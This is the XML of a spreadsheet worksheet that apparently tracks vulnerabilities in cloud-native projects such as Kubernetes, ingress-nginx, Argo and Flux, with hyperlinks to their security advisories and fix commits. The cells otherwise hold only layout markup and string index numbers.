    <hyperlink ref="K24" r:id="rId19" display="https://github.com/argoproj/argo-workflows/issues/6441&#10;&#10;https://github.com/argoproj/argo-workflows/security/advisories/GHSA-h563-xh25-x54q"/>
    <hyperlink ref="K31" r:id="rId20" display="https://github.com/backstage/backstage/security/advisories/GHSA-wg6p-jmpc-xjmr"/>
    <hyperlink ref="K32" r:id="rId21" display="https://github.com/backstage/backstage/security/advisories/GHSA-pvv8-8fx9-h673"/>
    <hyperlink ref="J34" r:id="rId22" display="https://github.com/fluxcd/source-controller/pull/903/commits/27f4ed5a472d1bd5b6bc7a62189f20c115338b3a"/>
    <hyperlink ref="K35" r:id="rId23" display="https://github.com/fluxcd/flux2/security/advisories/GHSA-p2g7-xwvr-rrw3"/>
    <hyperlink ref="K34" r:id="rId24" display="https://github.com/fluxcd/flux2/security/advisories/GHSA-f4p5-x4vc-mh4v"/>
    <hyperlink ref="K37" r:id="rId25" display="https://github.com/fluxcd/flux2/security/advisories/GHSA-7pwf-jg34-hxwp"/>
    <hyperlink ref="K18" r:id="rId26" display="https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364&#10;&#10;google research:&#10;https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm"/>
    <hyperlink ref="K19" r:id="rId27" display="https://bugzilla.redhat.com/show_bug.cgi?id=1848951"/>
    <hyperlink ref="K15" r:id="rId28" display="https://github.com/containerd/containerd/security/advisories/GHSA-5ffw-gxpp-mxpf"/>
    <hyperlink ref="K42" r:id="rId29" display="https://github.com/metal3-io/baremetal-operator/security/advisories/GHSA-pqfh-xh7w-7h3p"/>
    <hyperlink ref="K2" r:id="rId30" display="https://github.com/kubernetes/kubernetes/issues/126744"/>
    <hyperlink ref="K38" r:id="rId31" display="https://github.com/fluxcd/flux2/security/advisories/GHSA-vvmq-fwmg-2gjc" tooltip="https://github.com/fluxcd/flux2/security/advisories/GHSA-vvmq-fwmg-2gjc"/>
    <hyperlink ref="K21" r:id="rId32" display="https://github.com/argoproj/argo-cd/security/advisories/GHSA-q4w5-4gq2-98vm"/>
    <hyperlink ref="K22" r:id="rId33" display="https://github.com/argoproj/argo-cd/security/advisories/GHSA-jhqp-vf4w-rpwq"/>
    <hyperlink ref="K47" r:id="rId34" display="https://github.com/kubernetes/kubernetes/issues/131006" tooltip="https://github.com/kubernetes/kubernetes/issues/131006"/>
    <hyperlink ref="K46" r:id="rId35" display="https://github.com/kubernetes/kubernetes/issues/131008" tooltip="https://github.com/kubernetes/kubernetes/issues/131008"/>
    <hyperlink ref="K45" r:id="rId36" display="https://github.com/kubernetes/kubernetes/issues/131007" tooltip="https://github.com/kubernetes/kubernetes/issues/131007"/>
    <hyperlink ref="K48" r:id="rId37" display="https://github.com/kubernetes/kubernetes/issues/131005&#10;&#10;https://github.com/advisories/GHSA-242m-6h72-7hgp"/>
    <hyperlink ref="J47" r:id="rId38" display="https://github.com/kubernetes/ingress-nginx/pull/13068/commits/ab470eb920924d62a197ebddd8a4cc3031a77ddf"/>
    <hyperlink ref="J46" r:id="rId39" display="https://github.com/kubernetes/ingress-nginx/pull/13068/commits/2e9f37380afb7853fa6daa1c3e6659550aadfd90"/>
  </hyperlink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48576"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="4" ySplit="1" topLeftCell="E2" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="A2" sqref="A2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.89166666666667" defaultRowHeight="13.5"/>
  <cols>
    <col min="1" max="1" width="19.6666666666667" style="5" customWidth="1"/>
    <col min="2" max="2" width="19.6666666666667" style="44" customWidth="1"/>
    <col min="3" max="3" width="21" style="30" customWidth="1"/>
    <col min="4" max="4" width="27" style="30" customWidth="1"/>
    <col min="5" max="5" width="27.225" style="30" customWidth="1"/>
    <col min="6" max="6" width="32.9166666666667" style="5" customWidth="1"/>
    <col min="7" max="7" width="39.8916666666667" style="31" customWidth="1"/>
    <col min="8" max="8" width="19.6666666666667" style="5" customWidth="1"/>
    <col min="9" max="9" width="43.1083333333333" style="5" customWidth="1"/>
    <col min="10" max="10" width="53.0833333333333" style="5" customWidth="1"/>
    <col min="11" max="11" width="27.775" style="5" customWidth="1"/>
    <col min="12" max="12" width="11.3333333333333" style="5" customWidth="1"/>
    <col min="13" max="13" width="42.3333333333333" style="5" customWidth="1"/>
    <col min="14" max="14" width="35.3333333333333" style="5" customWidth="1"/>
    <col min="15" max="15" width="10" style="28"/>
    <col min="16" max="17" width="17.5583333333333" style="5" customWidth="1"/>
    <col min="18" max="20" width="8.89166666666667" style="5" customWidth="1"/>
    <col min="21" max="21" width="8.89166666666667" style="45"/>
    <col min="22" max="16384" width="8.89166666666667" style="24"/>
  </cols>
  <sheetData>
    <row r="1" s="24" customFormat="1" ht="56.25" spans="1:21">
      <c r="A1" s="5" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="5" t="s">
        <v>1014</v>
      </c>
      <c r="C1" s="29" t="s">
        <v>1015</v>
      </c>
      <c r="D1" s="30" t="s">
        <v>1016</v>
      </c>
      <c r="E1" s="30" t="s">
        <v>1017</v>
      </c>
      <c r="F1" s="5" t="s">
        <v>19</v>
      </c>
      <c r="G1" s="31" t="s">
        <v>1018</v>
      </c>
      <c r="H1" s="5" t="s">
        <v>1</v>
      </c>
      <c r="I1" s="5" t="s">
        <v>2</v>
      </c>
      <c r="J1" s="5" t="s">
        <v>5</v>
      </c>
      <c r="K1" s="5" t="s">
        <v>6</v>
      </c>
      <c r="L1" s="5" t="s">
        <v>7</v>
      </c>
      <c r="M1" s="5" t="s">
        <v>8</v>
      </c>
      <c r="N1" s="5" t="s">
        <v>9</v>
      </c>
      <c r="O1" s="28" t="s">
        <v>1537</v>
      </c>
      <c r="P1" s="37" t="s">
        <v>10</v>
      </c>
      <c r="Q1" s="37" t="s">
        <v>1538</v>
      </c>
      <c r="R1" s="37" t="s">
        <v>1539</v>
      </c>
      <c r="S1" s="37" t="s">
        <v>14</v>
      </c>
      <c r="T1" s="5" t="s">
        <v>13</v>
      </c>
      <c r="U1" s="46" t="s">
        <v>1540</v>
      </c>
    </row>
    <row r="2" s="23" customFormat="1" ht="258.75" spans="1:21">
      <c r="A2" s="6" t="s">
        <v>1022</v>
      </c>
      <c r="B2" s="6" t="s">
        <v>57</v>
      </c>
      <c r="C2" s="31" t="s">
        <v>1023</v>
      </c>
      <c r="D2" s="31" t="s">
        <v>1024</v>
      </c>
      <c r="E2" s="31" t="s">
        <v>1025</v>
      </c>
      <c r="F2" s="6" t="s">
        <v>1026</v>
      </c>
      <c r="G2" s="31" t="s">
        <v>1027</v>
      </c>
      <c r="H2" s="6"/>
      <c r="I2" s="5" t="s">
        <v>1028</v>
      </c>
      <c r="J2" s="6" t="s">
        <v>61</v>
      </c>
      <c r="K2" s="15" t="s">
        <v>62</v>
      </c>
      <c r="L2" s="6" t="s">
        <v>63</v>
      </c>
      <c r="M2" s="6" t="s">
        <v>64</v>
      </c>
      <c r="N2" s="6" t="s">
        <v>65</v>
      </c>
      <c r="O2" s="41" t="s">
        <v>1541</v>
      </c>
      <c r="P2" s="6" t="s">
        <v>647</v>
      </c>
      <c r="Q2" s="6" t="s">
        <v>1542</v>
      </c>
      <c r="R2" s="6" t="s">
        <v>1543</v>
      </c>
      <c r="S2" s="6" t="s">
        <v>70</v>
      </c>
      <c r="T2" s="6" t="s">
        <v>1544</v>
      </c>
      <c r="U2" s="6" t="s">
        <v>1545</v>
      </c>
    </row>
    <row r="3" s="23" customFormat="1" ht="409.5" spans="1:21">
      <c r="A3" s="6" t="s">
        <v>107</v>
      </c>
      <c r="B3" s="6" t="s">
        <v>1040</v>
      </c>
      <c r="C3" s="31" t="s">
        <v>1041</v>
      </c>
      <c r="D3" s="31" t="s">
        <v>1042</v>
      </c>
      <c r="E3" s="31" t="s">
        <v>1043</v>
      </c>
      <c r="F3" s="6" t="s">
        <v>116</v>
      </c>
      <c r="G3" s="31" t="s">
        <v>1044</v>
      </c>
      <c r="H3" s="6" t="s">
        <v>108</v>
      </c>
      <c r="I3" s="6"/>
      <c r="J3" s="6" t="s">
        <v>111</v>
      </c>
      <c r="K3" s="6" t="s">
        <v>112</v>
      </c>
      <c r="L3" s="6" t="s">
        <v>63</v>
      </c>
      <c r="M3" s="6" t="s">
        <v>113</v>
      </c>
      <c r="N3" s="6" t="s">
        <v>1045</v>
      </c>
      <c r="O3" s="41" t="s">
        <v>1546</v>
      </c>
      <c r="P3" s="6" t="s">
        <v>647</v>
      </c>
      <c r="Q3" s="6" t="s">
        <v>1542</v>
      </c>
      <c r="R3" s="6" t="s">
        <v>1543</v>
      </c>
      <c r="S3" s="6" t="s">
        <v>70</v>
      </c>
      <c r="T3" s="6" t="s">
        <v>1547</v>
      </c>
      <c r="U3" s="6" t="s">
        <v>1545</v>
      </c>
    </row>
    <row r="4" s="23" customFormat="1" ht="247.5" spans="1:21">
      <c r="A4" s="6" t="s">
        <v>131</v>
      </c>
      <c r="B4" s="6" t="s">
        <v>1048</v>
      </c>
      <c r="C4" s="31" t="s">
        <v>1049</v>
      </c>
      <c r="D4" s="31" t="s">
        <v>1050</v>
      </c>
      <c r="E4" s="31" t="s">
        <v>1051</v>
      </c>
      <c r="F4" s="6" t="s">
        <v>116</v>
      </c>
      <c r="G4" s="31" t="s">
        <v>1052</v>
      </c>
      <c r="H4" s="6" t="s">
        <v>71</v>
      </c>
      <c r="I4" s="6"/>
      <c r="J4" s="6" t="s">
        <v>134</v>
      </c>
      <c r="K4" s="6" t="s">
        <v>135</v>
      </c>
      <c r="L4" s="6" t="s">
        <v>63</v>
      </c>
      <c r="M4" s="6"/>
      <c r="N4" s="6" t="s">
        <v>136</v>
      </c>
      <c r="O4" s="41" t="s">
        <v>1548</v>
      </c>
      <c r="P4" s="6" t="s">
        <v>647</v>
      </c>
      <c r="Q4" s="6" t="s">
        <v>1542</v>
      </c>
      <c r="R4" s="6" t="s">
        <v>1543</v>
      </c>
      <c r="S4" s="6" t="s">
        <v>70</v>
      </c>
      <c r="T4" s="6" t="s">
        <v>1547</v>
      </c>
      <c r="U4" s="6" t="s">
        <v>1545</v>
      </c>
    </row>
    <row r="5" s="23" customFormat="1" ht="409.5" spans="1:21">
      <c r="A5" s="6" t="s">
        <v>138</v>
      </c>
      <c r="B5" s="6" t="s">
        <v>1053</v>
      </c>
      <c r="C5" s="31" t="s">
        <v>1054</v>
      </c>
      <c r="D5" s="31" t="s">
        <v>1055</v>
      </c>
      <c r="E5" s="31" t="s">
        <v>1056</v>
      </c>
      <c r="F5" s="6" t="s">
        <v>146</v>
      </c>
      <c r="G5" s="31" t="s">
        <v>1057</v>
      </c>
      <c r="H5" s="6" t="s">
        <v>71</v>
      </c>
      <c r="I5" s="6" t="s">
        <v>139</v>
      </c>
      <c r="J5" s="6" t="s">
        <v>142</v>
      </c>
      <c r="K5" s="6" t="s">
        <v>143</v>
      </c>
      <c r="L5" s="6" t="s">
        <v>63</v>
      </c>
      <c r="M5" s="6"/>
      <c r="N5" s="6" t="s">
        <v>144</v>
      </c>
      <c r="O5" s="41" t="s">
        <v>1549</v>
      </c>
      <c r="P5" s="6" t="s">
        <v>647</v>
      </c>
      <c r="Q5" s="6" t="s">
        <v>1542</v>
      </c>
      <c r="R5" s="6" t="s">
        <v>1543</v>
      </c>
      <c r="S5" s="6" t="s">
        <v>70</v>
      </c>
      <c r="T5" s="6" t="s">
        <v>1547</v>
      </c>
      <c r="U5" s="6" t="s">
        <v>1545</v>
      </c>
    </row>
    <row r="6" s="23" customFormat="1" ht="236.25" spans="1:21">
      <c r="A6" s="5" t="s">
        <v>1058</v>
      </c>
      <c r="B6" s="6" t="s">
        <v>153</v>
      </c>
      <c r="C6" s="31" t="s">
        <v>1059</v>
      </c>
      <c r="D6" s="31" t="s">
        <v>1060</v>
      </c>
      <c r="E6" s="31" t="s">
        <v>1061</v>
      </c>
      <c r="F6" s="5" t="s">
        <v>160</v>
      </c>
      <c r="G6" s="31" t="s">
        <v>1062</v>
      </c>
      <c r="H6" s="5"/>
      <c r="I6" s="5" t="s">
        <v>139</v>
      </c>
      <c r="J6" s="5" t="s">
        <v>155</v>
      </c>
      <c r="K6" s="5" t="s">
        <v>156</v>
      </c>
      <c r="L6" s="6" t="s">
        <v>63</v>
      </c>
      <c r="M6" s="5"/>
      <c r="N6" s="5" t="s">
        <v>157</v>
      </c>
      <c r="O6" s="41" t="s">
        <v>1550</v>
      </c>
      <c r="P6" s="6" t="s">
        <v>647</v>
      </c>
      <c r="Q6" s="6" t="s">
        <v>1542</v>
      </c>
      <c r="R6" s="6" t="s">
        <v>1543</v>
      </c>
      <c r="S6" s="6" t="s">
        <v>70</v>
      </c>
      <c r="T6" s="6" t="s">
        <v>1547</v>
      </c>
      <c r="U6" s="6" t="s">
        <v>1545</v>
      </c>
    </row>
    <row r="7" s="23" customFormat="1" ht="258.75" spans="1:21">
      <c r="A7" s="5" t="s">
        <v>1064</v>
      </c>
      <c r="B7" s="6" t="s">
        <v>171</v>
      </c>
      <c r="C7" s="31" t="s">
        <v>1065</v>
      </c>
      <c r="D7" s="31" t="s">
        <v>1066</v>
      </c>
      <c r="E7" s="31" t="s">
        <v>1067</v>
      </c>
      <c r="F7" s="5" t="s">
        <v>1068</v>
      </c>
      <c r="G7" s="31" t="s">
        <v>1069</v>
      </c>
      <c r="H7" s="5"/>
      <c r="I7" s="5" t="s">
        <v>1028</v>
      </c>
      <c r="J7" s="5" t="s">
        <v>174</v>
      </c>
      <c r="K7" s="5" t="s">
        <v>175</v>
      </c>
      <c r="L7" s="6" t="s">
        <v>63</v>
      </c>
      <c r="M7" s="5"/>
      <c r="N7" s="5" t="s">
        <v>1070</v>
      </c>
      <c r="O7" s="41" t="s">
        <v>1551</v>
      </c>
      <c r="P7" s="6" t="s">
        <v>647</v>
      </c>
      <c r="Q7" s="6" t="s">
        <v>1542</v>
      </c>
      <c r="R7" s="6" t="s">
        <v>1543</v>
      </c>
      <c r="S7" s="6" t="s">
        <v>70</v>
      </c>
      <c r="T7" s="6" t="s">
        <v>1547</v>
      </c>
      <c r="U7" s="6" t="s">
        <v>1545</v>
      </c>
    </row>
    <row r="8" s="23" customFormat="1" ht="180" spans="1:21">
      <c r="A8" s="5" t="s">
        <v>183</v>
      </c>
      <c r="B8" s="6" t="s">
        <v>183</v>
      </c>
      <c r="C8" s="31" t="s">
        <v>1071</v>
      </c>
      <c r="D8" s="31" t="s">
        <v>1072</v>
      </c>
      <c r="E8" s="31" t="s">
        <v>1073</v>
      </c>
      <c r="F8" s="5" t="s">
        <v>189</v>
      </c>
      <c r="G8" s="31" t="s">
        <v>1074</v>
      </c>
      <c r="H8" s="5" t="s">
        <v>184</v>
      </c>
      <c r="I8" s="5"/>
      <c r="J8" s="5" t="s">
        <v>186</v>
      </c>
      <c r="K8" s="5" t="s">
        <v>187</v>
      </c>
      <c r="L8" s="6" t="s">
        <v>63</v>
      </c>
      <c r="M8" s="5"/>
      <c r="N8" s="5" t="s">
        <v>188</v>
      </c>
      <c r="O8" s="41" t="s">
        <v>1552</v>
      </c>
      <c r="P8" s="6" t="s">
        <v>647</v>
      </c>
      <c r="Q8" s="6" t="s">
        <v>1542</v>
      </c>
      <c r="R8" s="6" t="s">
        <v>1543</v>
      </c>
      <c r="S8" s="6" t="s">
        <v>70</v>
      </c>
      <c r="T8" s="6" t="s">
        <v>1547</v>
      </c>
      <c r="U8" s="6" t="s">
        <v>1545</v>
      </c>
    </row>
    <row r="9" s="23" customFormat="1" ht="337.5" spans="1:21">
      <c r="A9" s="5" t="s">
        <v>193</v>
      </c>
      <c r="B9" s="6" t="s">
        <v>193</v>
      </c>
      <c r="C9" s="31" t="s">
        <v>1076</v>
      </c>
      <c r="D9" s="31" t="s">
        <v>1077</v>
      </c>
      <c r="E9" s="31" t="s">
        <v>1078</v>
      </c>
      <c r="F9" s="5" t="s">
        <v>200</v>
      </c>
      <c r="G9" s="31" t="s">
        <v>1079</v>
      </c>
      <c r="H9" s="5" t="s">
        <v>1080</v>
      </c>
      <c r="I9" s="5" t="s">
        <v>1028</v>
      </c>
      <c r="J9" s="5" t="s">
        <v>197</v>
      </c>
      <c r="K9" s="5" t="s">
        <v>198</v>
      </c>
      <c r="L9" s="6" t="s">
        <v>63</v>
      </c>
      <c r="M9" s="5"/>
      <c r="N9" s="5" t="s">
        <v>1081</v>
      </c>
      <c r="O9" s="41" t="s">
        <v>1553</v>
      </c>
      <c r="P9" s="6" t="s">
        <v>647</v>
      </c>
      <c r="Q9" s="6" t="s">
        <v>1542</v>
      </c>
      <c r="R9" s="6" t="s">
        <v>1543</v>
      </c>
      <c r="S9" s="6" t="s">
        <v>70</v>
      </c>
      <c r="T9" s="6" t="s">
        <v>1547</v>
      </c>
      <c r="U9" s="6" t="s">
        <v>1545</v>
      </c>
    </row>
    <row r="10" s="23" customFormat="1" ht="274" customHeight="1" spans="1:21">
      <c r="A10" s="5" t="s">
        <v>209</v>
      </c>
      <c r="B10" s="6" t="s">
        <v>209</v>
      </c>
      <c r="C10" s="7" t="s">
        <v>1087</v>
      </c>
      <c r="D10" s="7" t="s">
        <v>1088</v>
      </c>
      <c r="E10" s="7" t="s">
        <v>1089</v>
      </c>
      <c r="F10" s="5" t="s">
        <v>219</v>
      </c>
      <c r="G10" s="7" t="s">
        <v>1090</v>
      </c>
      <c r="H10" s="5" t="s">
        <v>210</v>
      </c>
      <c r="I10" s="5"/>
      <c r="J10" s="5" t="s">
        <v>1091</v>
      </c>
      <c r="K10" s="5" t="s">
        <v>214</v>
      </c>
      <c r="L10" s="5" t="s">
        <v>215</v>
      </c>
      <c r="M10" s="5"/>
      <c r="N10" s="5" t="s">
        <v>216</v>
      </c>
      <c r="O10" s="41" t="s">
        <v>1554</v>
      </c>
      <c r="P10" s="5" t="s">
        <v>67</v>
      </c>
      <c r="Q10" s="5" t="s">
        <v>1555</v>
      </c>
      <c r="R10" s="5" t="s">
        <v>1556</v>
      </c>
      <c r="S10" s="5" t="s">
        <v>70</v>
      </c>
      <c r="T10" s="5" t="s">
        <v>1557</v>
      </c>
      <c r="U10" s="6" t="s">
        <v>1558</v>
      </c>
    </row>
    <row r="11" s="23" customFormat="1" ht="409.5" spans="1:21">
      <c r="A11" s="5" t="s">
        <v>227</v>
      </c>
      <c r="B11" s="6" t="s">
        <v>1093</v>
      </c>
      <c r="C11" s="7" t="s">
        <v>1094</v>
      </c>
      <c r="D11" s="7" t="s">
        <v>1095</v>
      </c>
      <c r="E11" s="7" t="s">
        <v>1096</v>
      </c>
      <c r="F11" s="5" t="s">
        <v>1097</v>
      </c>
      <c r="G11" s="7" t="s">
        <v>1098</v>
      </c>
      <c r="H11" s="5" t="s">
        <v>228</v>
      </c>
      <c r="I11" s="5" t="s">
        <v>229</v>
      </c>
      <c r="J11" s="5" t="s">
        <v>232</v>
      </c>
      <c r="K11" s="14" t="s">
        <v>233</v>
      </c>
      <c r="L11" s="5" t="s">
        <v>234</v>
      </c>
      <c r="M11" s="5" t="s">
        <v>235</v>
      </c>
      <c r="N11" s="5" t="s">
        <v>1099</v>
      </c>
      <c r="O11" s="41" t="s">
        <v>1559</v>
      </c>
      <c r="P11" s="5" t="s">
        <v>67</v>
      </c>
      <c r="Q11" s="5" t="s">
        <v>1560</v>
      </c>
      <c r="R11" s="5" t="s">
        <v>84</v>
      </c>
      <c r="S11" s="5" t="s">
        <v>70</v>
      </c>
      <c r="T11" s="5" t="s">
        <v>237</v>
      </c>
      <c r="U11" s="6" t="s">
        <v>525</v>
      </c>
    </row>
    <row r="12" s="23" customFormat="1" ht="147" spans="1:21">
      <c r="A12" s="5" t="s">
        <v>244</v>
      </c>
      <c r="B12" s="6" t="s">
        <v>244</v>
      </c>
      <c r="C12" s="7" t="s">
        <v>1101</v>
      </c>
      <c r="D12" s="7" t="s">
        <v>1102</v>
      </c>
      <c r="E12" s="7" t="s">
        <v>1103</v>
      </c>
      <c r="F12" s="5" t="s">
        <v>254</v>
      </c>
      <c r="G12" s="7" t="s">
        <v>1104</v>
      </c>
      <c r="H12" s="5" t="s">
        <v>245</v>
      </c>
      <c r="I12" s="5" t="s">
        <v>246</v>
      </c>
      <c r="J12" s="5" t="s">
        <v>249</v>
      </c>
      <c r="K12" s="5" t="s">
        <v>250</v>
      </c>
      <c r="L12" s="5" t="s">
        <v>234</v>
      </c>
      <c r="M12" s="5" t="s">
        <v>251</v>
      </c>
      <c r="N12" s="5" t="s">
        <v>252</v>
      </c>
      <c r="O12" s="41" t="s">
        <v>1561</v>
      </c>
      <c r="P12" s="5" t="s">
        <v>396</v>
      </c>
      <c r="Q12" s="5" t="s">
        <v>1562</v>
      </c>
      <c r="R12" s="5"/>
      <c r="S12" s="5" t="s">
        <v>70</v>
      </c>
      <c r="T12" s="5"/>
      <c r="U12" s="6" t="s">
        <v>525</v>
      </c>
    </row>
    <row r="13" s="23" customFormat="1" ht="225" spans="1:21">
      <c r="A13" s="5" t="s">
        <v>259</v>
      </c>
      <c r="B13" s="6" t="s">
        <v>259</v>
      </c>
      <c r="C13" s="7" t="s">
        <v>1105</v>
      </c>
      <c r="D13" s="7" t="s">
        <v>1106</v>
      </c>
      <c r="E13" s="7" t="s">
        <v>1107</v>
      </c>
      <c r="F13" s="5" t="s">
        <v>1108</v>
      </c>
      <c r="G13" s="7" t="s">
        <v>1109</v>
      </c>
      <c r="H13" s="5" t="s">
        <v>260</v>
      </c>
      <c r="I13" s="5" t="s">
        <v>261</v>
      </c>
      <c r="J13" s="5" t="s">
        <v>264</v>
      </c>
      <c r="K13" s="14" t="s">
        <v>265</v>
      </c>
      <c r="L13" s="5" t="s">
        <v>234</v>
      </c>
      <c r="M13" s="5" t="s">
        <v>266</v>
      </c>
      <c r="N13" s="5" t="s">
        <v>267</v>
      </c>
      <c r="O13" s="41" t="s">
        <v>1563</v>
      </c>
      <c r="P13" s="5" t="s">
        <v>67</v>
      </c>
      <c r="Q13" s="5" t="s">
        <v>1564</v>
      </c>
      <c r="R13" s="5" t="s">
        <v>84</v>
      </c>
      <c r="S13" s="5" t="s">
        <v>70</v>
      </c>
      <c r="T13" s="5" t="s">
        <v>237</v>
      </c>
      <c r="U13" s="6" t="s">
        <v>525</v>
      </c>
    </row>
    <row r="14" s="23" customFormat="1" ht="409.5" spans="1:21">
      <c r="A14" s="5" t="s">
        <v>282</v>
      </c>
      <c r="B14" s="6" t="s">
        <v>282</v>
      </c>
      <c r="C14" s="7" t="s">
        <v>1111</v>
      </c>
      <c r="D14" s="7" t="s">
        <v>1112</v>
      </c>
      <c r="E14" s="7" t="s">
        <v>1113</v>
      </c>
      <c r="F14" s="5" t="s">
        <v>1114</v>
      </c>
      <c r="G14" s="7" t="s">
        <v>1115</v>
      </c>
      <c r="H14" s="5"/>
      <c r="I14" s="5" t="s">
        <v>283</v>
      </c>
      <c r="J14" s="5" t="s">
        <v>286</v>
      </c>
      <c r="K14" s="5" t="s">
        <v>277</v>
      </c>
      <c r="L14" s="5" t="s">
        <v>287</v>
      </c>
      <c r="M14" s="5" t="s">
        <v>288</v>
      </c>
      <c r="N14" s="5" t="s">
        <v>289</v>
      </c>
      <c r="O14" s="41" t="s">
        <v>1565</v>
      </c>
      <c r="P14" s="5" t="s">
        <v>1566</v>
      </c>
      <c r="Q14" s="5"/>
      <c r="R14" s="5" t="s">
        <v>84</v>
      </c>
      <c r="S14" s="5" t="s">
        <v>70</v>
      </c>
      <c r="T14" s="5" t="s">
        <v>69</v>
      </c>
      <c r="U14" s="6" t="s">
        <v>525</v>
      </c>
    </row>
    <row r="15" s="23" customFormat="1" ht="213.75" spans="1:21">
      <c r="A15" s="5" t="s">
        <v>302</v>
      </c>
      <c r="B15" s="6" t="s">
        <v>302</v>
      </c>
      <c r="C15" s="7" t="s">
        <v>1117</v>
      </c>
      <c r="D15" s="7" t="s">
        <v>1118</v>
      </c>
      <c r="E15" s="7" t="s">
        <v>1119</v>
      </c>
      <c r="F15" s="5" t="s">
        <v>309</v>
      </c>
      <c r="G15" s="7" t="s">
        <v>1120</v>
      </c>
      <c r="H15" s="5" t="s">
        <v>303</v>
      </c>
      <c r="I15" s="5" t="s">
        <v>246</v>
      </c>
      <c r="J15" s="5" t="s">
        <v>306</v>
      </c>
      <c r="K15" s="5" t="s">
        <v>307</v>
      </c>
      <c r="L15" s="5" t="s">
        <v>308</v>
      </c>
      <c r="M15" s="5" t="s">
        <v>251</v>
      </c>
      <c r="N15" s="5" t="s">
        <v>252</v>
      </c>
      <c r="O15" s="41" t="s">
        <v>1567</v>
      </c>
      <c r="P15" s="5" t="s">
        <v>396</v>
      </c>
      <c r="Q15" s="5" t="s">
        <v>1562</v>
      </c>
      <c r="R15" s="5"/>
      <c r="S15" s="5" t="s">
        <v>70</v>
      </c>
      <c r="T15" s="5"/>
      <c r="U15" s="6" t="s">
        <v>525</v>
      </c>
    </row>
    <row r="16" s="23" customFormat="1" ht="360" spans="1:21">
      <c r="A16" s="6" t="s">
        <v>323</v>
      </c>
      <c r="B16" s="6" t="s">
        <v>323</v>
      </c>
      <c r="C16" s="7" t="s">
        <v>1122</v>
      </c>
      <c r="D16" s="7" t="s">
        <v>1123</v>
      </c>
      <c r="E16" s="7" t="s">
        <v>1124</v>
      </c>
      <c r="F16" s="6" t="s">
        <v>1125</v>
      </c>
      <c r="G16" s="7" t="s">
        <v>1126</v>
      </c>
      <c r="H16" s="6" t="s">
        <v>324</v>
      </c>
      <c r="I16" s="6"/>
      <c r="J16" s="5" t="s">
        <v>327</v>
      </c>
      <c r="K16" s="14" t="s">
        <v>328</v>
      </c>
      <c r="L16" s="6" t="s">
        <v>314</v>
      </c>
      <c r="M16" s="6" t="s">
        <v>329</v>
      </c>
      <c r="N16" s="5" t="s">
        <v>330</v>
      </c>
      <c r="O16" s="41" t="s">
        <v>1568</v>
      </c>
      <c r="P16" s="6" t="s">
        <v>67</v>
      </c>
      <c r="Q16" s="6" t="s">
        <v>1569</v>
      </c>
      <c r="R16" s="6"/>
      <c r="S16" s="5" t="s">
        <v>70</v>
      </c>
      <c r="T16" s="6"/>
      <c r="U16" s="10" t="s">
        <v>1545</v>
      </c>
    </row>
    <row r="17" s="23" customFormat="1" ht="315" spans="1:21">
      <c r="A17" s="5" t="s">
        <v>336</v>
      </c>
      <c r="B17" s="6" t="s">
        <v>336</v>
      </c>
      <c r="C17" s="7" t="s">
        <v>1129</v>
      </c>
      <c r="D17" s="7" t="s">
        <v>1130</v>
      </c>
      <c r="E17" s="7" t="s">
        <v>1131</v>
      </c>
      <c r="F17" s="5" t="s">
        <v>346</v>
      </c>
      <c r="G17" s="7" t="s">
        <v>1132</v>
      </c>
      <c r="H17" s="5" t="s">
        <v>1133</v>
      </c>
      <c r="I17" s="6"/>
      <c r="J17" s="5" t="s">
        <v>340</v>
      </c>
      <c r="K17" s="15" t="s">
        <v>341</v>
      </c>
      <c r="L17" s="5" t="s">
        <v>342</v>
      </c>
      <c r="M17" s="6" t="s">
        <v>343</v>
      </c>
      <c r="N17" s="6" t="s">
        <v>1135</v>
      </c>
      <c r="O17" s="41" t="s">
        <v>1570</v>
      </c>
      <c r="P17" s="5" t="s">
        <v>67</v>
      </c>
      <c r="Q17" s="6" t="s">
        <v>1569</v>
      </c>
      <c r="R17" s="6"/>
      <c r="S17" s="6" t="s">
        <v>70</v>
      </c>
      <c r="T17" s="6"/>
      <c r="U17" s="6" t="s">
        <v>1571</v>
      </c>
    </row>
    <row r="18" s="23" customFormat="1" ht="409.5" spans="1:21">
      <c r="A18" s="5" t="s">
        <v>358</v>
      </c>
      <c r="B18" s="6" t="s">
        <v>1138</v>
      </c>
      <c r="C18" s="7" t="s">
        <v>1139</v>
      </c>
      <c r="D18" s="7" t="s">
        <v>1140</v>
      </c>
      <c r="E18" s="7" t="s">
        <v>1141</v>
      </c>
      <c r="F18" s="5" t="s">
        <v>1142</v>
      </c>
      <c r="G18" s="7" t="s">
        <v>1143</v>
      </c>
      <c r="H18" s="5" t="s">
        <v>359</v>
      </c>
      <c r="I18" s="6" t="s">
        <v>283</v>
      </c>
      <c r="J18" s="6" t="s">
        <v>1145</v>
      </c>
      <c r="K18" s="6" t="s">
        <v>1146</v>
      </c>
      <c r="L18" s="5" t="s">
        <v>364</v>
      </c>
      <c r="M18" s="5" t="s">
        <v>1147</v>
      </c>
      <c r="N18" s="6" t="s">
        <v>1148</v>
      </c>
      <c r="O18" s="41" t="s">
        <v>1572</v>
      </c>
      <c r="P18" s="6" t="s">
        <v>67</v>
      </c>
      <c r="Q18" s="6" t="s">
        <v>1573</v>
      </c>
      <c r="R18" s="6" t="s">
        <v>84</v>
      </c>
      <c r="S18" s="6" t="s">
        <v>70</v>
      </c>
      <c r="T18" s="6" t="s">
        <v>1574</v>
      </c>
      <c r="U18" s="6" t="s">
        <v>525</v>
      </c>
    </row>
    <row r="19" s="23" customFormat="1" ht="270" spans="1:21">
      <c r="A19" s="9" t="s">
        <v>374</v>
      </c>
      <c r="B19" s="6" t="s">
        <v>374</v>
      </c>
      <c r="C19" s="7" t="s">
        <v>1151</v>
      </c>
      <c r="D19" s="7" t="s">
        <v>1152</v>
      </c>
      <c r="E19" s="7" t="s">
        <v>1153</v>
      </c>
      <c r="F19" s="9" t="s">
        <v>1154</v>
      </c>
      <c r="G19" s="7" t="s">
        <v>1155</v>
      </c>
      <c r="H19" s="5" t="s">
        <v>375</v>
      </c>
      <c r="I19" s="6" t="s">
        <v>283</v>
      </c>
      <c r="J19" s="16" t="s">
        <v>378</v>
      </c>
      <c r="K19" s="17" t="s">
